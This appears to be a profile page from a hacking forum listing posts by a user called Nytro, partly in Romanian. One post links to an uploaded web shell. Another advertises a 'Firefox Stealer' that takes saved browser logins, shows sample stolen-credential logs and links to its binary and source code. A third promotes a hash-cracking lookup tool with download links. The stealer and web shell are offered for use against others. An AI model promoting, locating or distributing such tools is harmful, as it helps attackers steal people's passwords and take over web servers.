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Everything posted by Nytro

  1. Pagube de 800.000$ pe dracu... Mai degraba pagube morale pentru ca i-a facut de ras intr-un fel sau altul.
  2. Uploaded: http://hack-bay.com/Shells/gny.txt
  3. Nu eram sigur daca l-am mai postat. La search nu l-am gasit.
  4. Nytro


    Done, closed.
  5. Simple Firefox Stealer Stub Size: 26kb's Logs preview: ===================================== ========== Firefox Stealer ========== ===== HackHound.Org - Visit Us! ===== ===================================== -------------------- https://ssl.rapidshare.com test001 test -------------------- ===================================== ======== c0ded By |x Seabra x|======= ===================================== Download ( Binary + Source code ): http://www.2shared.com/file/6972008/79c5c77c/FF_Stealer__SRC.html
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  25. Got a hash? Will chase it for online services? Now it has become much easier! Download ArxFuckingHash, enter hash (md5, Mysql, Sha1) and run the program itself will take place on the list of public services and make the parsing, then you display the result in a convenient form. Advantages: - Work in 10 streams (10 to check services at once). - Search for md5, sha1, mysql. - Ability to edit the configuration of servers (servers.ini), ie you can compile your own list. - The program has a convenient, attractive interface. - Search multiple hash (adding to the list). - Create a md5 string, or file. - Built-checker working and not working services / settings. - Ability to edit mode, online services, see web page at once, and the source code. - Also in the folder, help, help file is for editing the parameters of service. Supported types of hash: - Md5 - Sha-1 - MySQL Updates Second Edition: - Added 3 new MD5 service, now 28! - Now you can create not only the MD5 hash, and SHA1, CRC - A new system for determining the type of hash - Now the program is not only in Russian but in English - Transfer the program to be in a separate file, which makes it possible to translate the program into any language - Fixed a couple of mistakes In the folder is a file 'english.txt', to translate to English language, just rename the file 'english.txt' on 'active.txt'. Download: http://depositfiles.com/files/9gx0vr7zk http://rghost.ru/363643
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